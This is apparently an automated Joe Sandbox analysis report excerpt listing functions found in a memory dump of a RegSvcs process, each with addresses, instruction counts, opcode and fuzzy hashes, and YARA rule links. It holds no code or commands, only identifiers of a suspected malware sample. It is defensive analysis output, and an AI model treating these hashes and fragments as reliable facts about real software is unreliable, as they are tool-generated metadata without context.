2839->2852 2841->2839 2842->2839 2849 6bbb1c6-6bbb1db 2843->2849 2850 6bbb0e5-6bbb1c0 call 6bb6608 2843->2850 2844->2843 2849->2811 2850->2849 2855 6bbaee3 2851->2855 2856 6bbaee5-6bbaee7 2851->2856 2860 6bbaf1a-6bbaf2b 2852->2860 2861 6bbaf04-6bbaf0a 2852->2861 2855->2852 2856->2852 2860->2778 2863 6bbaf0e-6bbaf10 2861->2863 2864 6bbaf0c 2861->2864 2863->2860 2864->2860
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4341d73417078cc1720fb35a0e3e0aa4eabbd6903061ebaf6f8e622c1a2981ff
                          • Instruction ID: 9f78ffd5240b18ef1fad608928586440d59688f1ed77e9a91e48a89253d41248
                          • Opcode Fuzzy Hash: 4341d73417078cc1720fb35a0e3e0aa4eabbd6903061ebaf6f8e622c1a2981ff
                          • Instruction Fuzzy Hash: 27E15BB0E102098FDB64DB69D4906FEB7B6EB88300F20956AD406EB354DBB5DC42CB91
                          Function 06BB91B8 Relevance: .2, Instructions: 230COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2074c771029377bc10e13a9f6a1d314fde319598400a1d7cc296be5cf0d0ca5
                          • Instruction ID: 4e1f0f5a3df278fe2a3975c91b603a9916748079bd22f4a52c5e1e2870407188
                          • Opcode Fuzzy Hash: a2074c771029377bc10e13a9f6a1d314fde319598400a1d7cc296be5cf0d0ca5
                          • Instruction Fuzzy Hash: 68915170B0021A8FDB64EB65D8607BEB7B6FF89300F1494A9C549EB354EF759C418B90
                          Function 06BB6258 Relevance: .2, Instructions: 229COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e2e2725e92fb5abd5f47d174c9ab84f856058b366208e556bf87d8fd4d8e273
                          • Instruction ID: 7ec6f9f5aee3c5f8269d1ccf34c1212c3c5e0f608c489a667e7e5ceeca668960
                          • Opcode Fuzzy Hash: 5e2e2725e92fb5abd5f47d174c9ab84f856058b366208e556bf87d8fd4d8e273
                          • Instruction Fuzzy Hash: 3861E6B1F001114BEF259B6EC9549AEBBE7EFC4620B194479D40ADB360EEB5DC0287D1
                          Function 06BB4350 Relevance: .2, Instructions: 225COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7404ed7c2e6db5d3b43590aa608a27152e6f8cd6779f0dea0d846ce4f3ec76e
                          • Instruction ID: 47bd40bcd4090f20cb2e3700f051471a13a575a15a29e518b05946c51a713d3e
                          • Opcode Fuzzy Hash: c7404ed7c2e6db5d3b43590aa608a27152e6f8cd6779f0dea0d846ce4f3ec76e
                          • Instruction Fuzzy Hash: 3A815E70B002058FDF54DFA8C5A47AEB7F6EB89310F149469D40AEB399EB74DC428B91
                          Function 06BB4670 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f771f6f6d970e478b3c81644c21b0b55f1539755c21a35a0d49398d2bd5a9a02
                          • Instruction ID: 6d3abcf6fe900453cb8be68f94861745fe2291ba6fc1deee86f587b3eb22ebdc
                          • Opcode Fuzzy Hash: f771f6f6d970e478b3c81644c21b0b55f1539755c21a35a0d49398d2bd5a9a02
                          • Instruction Fuzzy Hash: 3A914D70E102198FDF60DFA8C890BDDB7B1FF89300F209599D549AB295DB70AA85CF91
                          Function 06BB4688 Relevance: .2, Instructions: 210COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a27670ab965f9a053d2d8b097558423e47baf35658dd8928aeecded8b3a0a726
                          • Instruction ID: 65047ab0e9b611f39a742784d37dbf85b14d6d2c59630e58a16e6af99e81b434
                          • Opcode Fuzzy Hash: a27670ab965f9a053d2d8b097558423e47baf35658dd8928aeecded8b3a0a726
                          • Instruction Fuzzy Hash: 53913C70E102198BDF60DFA8C880BDDB7B1FF89300F209599D549BB255DB71AA85CF90
                          Function 06BBEB68 Relevance: .2, Instructions: 204COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7bbc67f93b83aff8f4d0cdfe8a45b75de30d7b6bda68da4b4dd8882bc66dc35
                          • Instruction ID: bcc4364d85485159e8c60f43fd553e3b90824a592bee1c472d8cdde1c84cdcb5
                          • Opcode Fuzzy Hash: e7bbc67f93b83aff8f4d0cdfe8a45b75de30d7b6bda68da4b4dd8882bc66dc35
                          • Instruction Fuzzy Hash: 74713AB0A002099FDB54DFA9D990AEDBBF6FF88300F149569D015AB265DBB4EC42CB50
                          Function 06BBEB78 Relevance: .2, Instructions: 201COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21bd61e24dc4d37afc692f287b6c58a817e73b5b66e626007ab551727ec0e497
                          • Instruction ID: 6dd67efb1955031e0ec89e6564ccc8b7b530efd8399320c8597b3e61e40f248a
                          • Opcode Fuzzy Hash: 21bd61e24dc4d37afc692f287b6c58a817e73b5b66e626007ab551727ec0e497
                          • Instruction Fuzzy Hash: B37139B0A002099FDB54DFA9D990AEDBBF6FF88300F149569D005AB365DBB4EC46CB50
                          Function 06BB4C20 Relevance: .2, Instructions: 186COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b44b9ed43faf393a3e11c6141b25e521b18cacdb38c6b7b5190caa405ba00621
                          • Instruction ID: 3e540667c2e3cb74960ca6edafa25caf1ef68d3268813b9e28fa1413ddc00018
                          • Opcode Fuzzy Hash: b44b9ed43faf393a3e11c6141b25e521b18cacdb38c6b7b5190caa405ba00621
                          • Instruction Fuzzy Hash: 15618170F002099FEF549FB5D8547AEBBF6FB88700F20846AD106AB395DBB55C458B90
                          Function 06BBFCE0 Relevance: .2, Instructions: 175COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d5888745b85b1d40dfc63d582d3cf9dd3254a7b7022e2ef5afbe4f465475f4b
                          • Instruction ID: 08645b3ca56c623ece367b1f885cafce5b74e481e5d5b6ec1cd634f87b73eb0f
                          • Opcode Fuzzy Hash: 5d5888745b85b1d40dfc63d582d3cf9dd3254a7b7022e2ef5afbe4f465475f4b
                          • Instruction Fuzzy Hash: A751F1B1E00209DFDF64AF78E8542BDB7B6EF89311F1098AAE106D7251DB758845CB80
                          Function 06BBFA8F Relevance: .2, Instructions: 169COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e3ef365bc11b10b7e5fc47ffa19e4531c7eab6a49d54b3fbb6c54a37c7b7b4c
                          • Instruction ID: 434c28b9557613c45a5c1b854e287473d1d6578a3c4c5d4e714b2c273b610f5d
                          • Opcode Fuzzy Hash: 7e3ef365bc11b10b7e5fc47ffa19e4531c7eab6a49d54b3fbb6c54a37c7b7b4c
                          • Instruction Fuzzy Hash: CC51C9B0B102149BFF649668DC647BF366EE78D350F20646AD50BC73A5C9BDCC4187A2
                          Function 06BBFAA0 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f59cb5b2413d289e8625e4b74780e096075ce2ca14020880ea70e0f4cb65bf91
                          • Instruction ID: a22fa0b56f955ded2850f2fb8f4d453c0a3ca5967d3ed888135a5a7853f5f485
                          • Opcode Fuzzy Hash: f59cb5b2413d289e8625e4b74780e096075ce2ca14020880ea70e0f4cb65bf91
                          • Instruction Fuzzy Hash: CE51B9B0B102149BFF649668DC647BF366EE78D310F20646AD50BC73A5C9BDCC4197A2
                          Function 06BB91A8 Relevance: .2, Instructions: 162COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce1db8724a8d6970f7fbcc2cd47e174d2958eec68260a4f04628b933697b0d2f
                          • Instruction ID: 87b62526bef7b404dc884e23d5e1e08f6f42c3629c38e1bedba03795fc29dd64
                          • Opcode Fuzzy Hash: ce1db8724a8d6970f7fbcc2cd47e174d2958eec68260a4f04628b933697b0d2f
                          • Instruction Fuzzy Hash: C2517F70B001058FDB58EB78D8A0BBEB7F6EB89700F54946AC549EB394DF759C018BA0
                          Function 06BB4C11 Relevance: .1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36b7ea8fbf1de7bdef8c6b8af9bf4e3e1ca0f6dd0f94c5fbe229fcb5cbf8d84a
                          • Instruction ID: 710e36217e66c9b3de9d7834b3d16ca2770f7f1af483ef70fb433a42eaa076a6
                          • Opcode Fuzzy Hash: 36b7ea8fbf1de7bdef8c6b8af9bf4e3e1ca0f6dd0f94c5fbe229fcb5cbf8d84a
                          • Instruction Fuzzy Hash: 53516170F002199FEB549FA5C854BAEBBF6FF88700F208529D105AB395DA759C458B90
                          Function 06BB54C8 Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f85c8a25c60cf075e6e1592e249ea36986ec488bd66ad398b8f834648554543a
                          • Instruction ID: dd5f288977bc2314ea82c975f5f8cf2f9807d7848671051fe4585cdb18c0c522
                          • Opcode Fuzzy Hash: f85c8a25c60cf075e6e1592e249ea36986ec488bd66ad398b8f834648554543a
                          • Instruction Fuzzy Hash: ED417EB2E006098FDB70CFA9D880BFFB7B2EB44210F10596AE216D7650D771E8458B96
                          Function 06BB5640 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba316d556de5993e548ffe4e84b1f83ce551a84f85f47b22fe5fcd6292365eef
                          • Instruction ID: 9b3259aa0548f9a720d1e5c1e3a4bea0d21f7bae2ce15fb692e0d6faefc8b29a
                          • Opcode Fuzzy Hash: ba316d556de5993e548ffe4e84b1f83ce551a84f85f47b22fe5fcd6292365eef
                          • Instruction Fuzzy Hash: BD4199B6F102458FDF708F6AC4807BEBBB2EB45310F14E8AAD156DB641C6B5D841CB92
                          Function 06BBDB25 Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4640d4a99f36e138f1d05ac8dd78cec17c1cac4d4dd341a5cd669d64705a8d5
                          • Instruction ID: 40a652495ed7ddbcfa65567c83dec19d4692c3dd1d82b50754c1dba13ebd56ba
                          • Opcode Fuzzy Hash: a4640d4a99f36e138f1d05ac8dd78cec17c1cac4d4dd341a5cd669d64705a8d5
                          • Instruction Fuzzy Hash: A5419EB0E007099FDB60DFA5D4946AEBBB6FF85700F10556AD405EB240DBB9D842CB91
                          Function 06BB228D Relevance: .1, Instructions: 107COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d7a2a0ccfa800dea858a594e3c99942fda82764e055b6e73c213107e3e4226e
                          • Instruction ID: e01a242d7ba924b3cf9910044e8a4281a71be50fc4c15f7661e91ddad709c89e
                          • Opcode Fuzzy Hash: 9d7a2a0ccfa800dea858a594e3c99942fda82764e055b6e73c213107e3e4226e
                          • Instruction Fuzzy Hash: D831CE70B002018FDB68AB74D4546BE7BB6EB89710F1464A9D402DB3A5DF75CD05C7A1
                          Function 06BB22A0 Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebaa91a9d16c03ae47944bb650f378d69302efcd52c887ae1e4d005d442e63cf
                          • Instruction ID: 43af79c1fd95a2f1d9daccefd248d1a6e08f98c3af2d0eacf5a3f229cad9b5fa
                          • Opcode Fuzzy Hash: ebaa91a9d16c03ae47944bb650f378d69302efcd52c887ae1e4d005d442e63cf
                          • Instruction Fuzzy Hash: 9C31D070B002058FDBA8AB74D4586BF7BA6EF89710F14A46DD402EB365DE75CD02CB91
                          Function 06BBD9D8 Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05f5b462de39aba50b87d4a9d0864ca1323b79ae901b297df0fb29e9c3da06a2
                          • Instruction ID: 5cdd81108016db2adca6c6967487582b985edd46b060593cf9374b7a78334e60
                          • Opcode Fuzzy Hash: 05f5b462de39aba50b87d4a9d0864ca1323b79ae901b297df0fb29e9c3da06a2
                          • Instruction Fuzzy Hash: 69319470E103099FDB24DF65D490AEEB7B6FF89300F109969E505AB210DBB4E9468B91
                          Function 06BB2150 Relevance: .1, Instructions: 96COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae2737dcfb21fec59073b67a05f6137f8d2da7de691e47b8e95ee40884a6036d
                          • Instruction ID: 6a6c2327e534c6f144eb2f41504480679a0e11b6b3fb57666d8ffca03bf4c1ca
                          • Opcode Fuzzy Hash: ae2737dcfb21fec59073b67a05f6137f8d2da7de691e47b8e95ee40884a6036d
                          • Instruction Fuzzy Hash: 34318F71E102069FCB59CF64C894ABEB7B2FF89700F109529E906E7750EB71AD42CB50
                          Function 06BB2160 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2275e48536d94a1e9d39f8f3fddf3650d27bcdd1aca680c18e3776e3691560b
                          • Instruction ID: 44a3f9751cfc9583aead1005ffd1bc9b4f97f6212ba192915cc12fd0ca34dff5
                          • Opcode Fuzzy Hash: e2275e48536d94a1e9d39f8f3fddf3650d27bcdd1aca680c18e3776e3691560b
                          • Instruction Fuzzy Hash: 82317C70E102099BCB59CF64C894AAEB7F2FF89700F109529E906E7750EBB1ED42CB50
                          Function 06BB3B50 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2014efa1a06a1db616acef816bd9ce205521cc251a8be2809c97d01123ce832
                          • Instruction ID: 99730cf231e99063b29859e2fbc03e03664534309b3c181f43b99b18ae53d6c8
                          • Opcode Fuzzy Hash: c2014efa1a06a1db616acef816bd9ce205521cc251a8be2809c97d01123ce832
                          • Instruction Fuzzy Hash: 33318DB1F002149FDB50DFA9D880AEEBBF5EB48710F10906AE901EB380E774DC418BA4
                          Function 06BB3B60 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd63d11c7f196f878062f65eb4c6785efd23b2005458c42941f57eaf81c1132c
                          • Instruction ID: 26d9210bbe80a16d6ee6de9779afbf249073e547119c55903804470c0e691fc5
                          • Opcode Fuzzy Hash: bd63d11c7f196f878062f65eb4c6785efd23b2005458c42941f57eaf81c1132c
                          • Instruction Fuzzy Hash: 89217CB5F006149FDB60DFA9D880AEEBBF5EB48710F109069E905E7390EB74DC408BA4
                          Function 06BB3C70 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60732b00aaabae5877e964bd785b8cae7ef4155d67c4cb56d0d2300552052a92
                          • Instruction ID: a04760a793124345a947aa2a03df469556a1deb277f20a6c67df7ba6c6dd9bea
                          • Opcode Fuzzy Hash: 60732b00aaabae5877e964bd785b8cae7ef4155d67c4cb56d0d2300552052a92
                          • Instruction Fuzzy Hash: 36118E72B042289BCF599A78DC646FE77FAEBC9311F04557AC406E7340EE65DC028BA1
                          Function 06BBA36F Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9ce90721991329f8b9d8cb9123d556af21b551b033289a78b2c1b193d5c5506
                          • Instruction ID: 3f36089caf8f02deeb0fa8c3343d346e7f3177ca04b6e2aef03d34087c82913d
                          • Opcode Fuzzy Hash: c9ce90721991329f8b9d8cb9123d556af21b551b033289a78b2c1b193d5c5506
                          • Instruction Fuzzy Hash: 6B01B171F001105FCB659A68D850BAEB7EAEB8A750F10A47AE14ACB352DF31DC028391
                          Function 06BB3928 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a0f59415ada9d00159b3439de59037fb8ced29f7cda39ea4ed9fddbfd6cccb9
                          • Instruction ID: e349dde02f14dee155c761a899fd477c47c7d841c63a82bc5c825064d62907cb
                          • Opcode Fuzzy Hash: 5a0f59415ada9d00159b3439de59037fb8ced29f7cda39ea4ed9fddbfd6cccb9
                          • Instruction Fuzzy Hash: 5D21C0B5D01219AFDB00DF9AD884ADEFBB8FB49310F10812AE918A7641D374A944CBA5
                          Function 06BB42B0 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 34596beb5f3eebbc5eba1bfb898e4eaf1da6e89030a159dd4e1870734aed3d8b
                          • Instruction ID: f17086b7e55fe5f6f66d786b088ac8c01995afa36d6730b1aca0010c930af5e5
                          • Opcode Fuzzy Hash: 34596beb5f3eebbc5eba1bfb898e4eaf1da6e89030a159dd4e1870734aed3d8b
                          • Instruction Fuzzy Hash: C501FC71B041100FDB6596BD941076FB7E6DBC9B10F14947DE20ACB397EAA1CD414391
                          Function 06BB3C60 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9086e60ec7db9716d60b60b1b0ea6f88a1238acf860b9bd20e32e82f3098f0c7
                          • Instruction ID: e6e78c6d7c3ba970b99bb97fb0569dc149a0394fe9335357fda2741fc1595156
                          • Opcode Fuzzy Hash: 9086e60ec7db9716d60b60b1b0ea6f88a1238acf860b9bd20e32e82f3098f0c7
                          • Instruction Fuzzy Hash: 8E01D476B141245BCB989968DC246FB73EBDBC9310F04513AD006D7380DE65CC0247E1
                          Function 06BBEDE9 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1955605a3451bcb0fa154e5eadfd34ae9f7a6ea063488476c725868c4cbeb41c
                          • Instruction ID: 5446b0ee39e5f137bf6b10c41f9798f31b26df36ff9d0db04536204b8dc60f55
                          • Opcode Fuzzy Hash: 1955605a3451bcb0fa154e5eadfd34ae9f7a6ea063488476c725868c4cbeb41c
                          • Instruction Fuzzy Hash: 42012431B141010BCBA59A3DA850BBF77D6DBCA750F14987DE10AC7352DA61DC024395
                          Function 06BB3930 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8d394da3863829acaf11e1a46cac32f282cf27ab12c8cfa32232f507c69ff69
                          • Instruction ID: 499f076d8b95f9aef6b77b3185e4e0d1784103cf48cfb420439258652d18f7a6
                          • Opcode Fuzzy Hash: d8d394da3863829acaf11e1a46cac32f282cf27ab12c8cfa32232f507c69ff69
                          • Instruction Fuzzy Hash: E711CFB5D01219AFDB00CF9AD884ADEFBB8FB49310F10812AE918A7241D374A944CFA5
                          Function 06BB42C0 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc186df1b40f2d2826df7ad11c71afd357c22f079e6652cca458bd391ee31bf4
                          • Instruction ID: bbe7f5e5116507c8bee6f90115ba3cfc30d661783ff67a557242dd2d45e7b163
                          • Opcode Fuzzy Hash: bc186df1b40f2d2826df7ad11c71afd357c22f079e6652cca458bd391ee31bf4
                          • Instruction Fuzzy Hash: 2701D171B001100BDB659AADD450B6FB3DAEBC9B20F14A83DE20AC7386EEA1DC420391
                          Function 06BBEDF8 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74b1aafe377a9441555b334f4311e5180c18904cbc73899539c23b14ebbb74fd
                          • Instruction ID: e13eba78dabf92162f18bad722394a40baa46d0c1974d4433442449c5402ff3d
                          • Opcode Fuzzy Hash: 74b1aafe377a9441555b334f4311e5180c18904cbc73899539c23b14ebbb74fd
                          • Instruction Fuzzy Hash: 5C01D171B101100BDBA5996EA450BBF73D6D7CD751F14983DE10AC7351EF61DC024395
                          Function 06BBA380 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
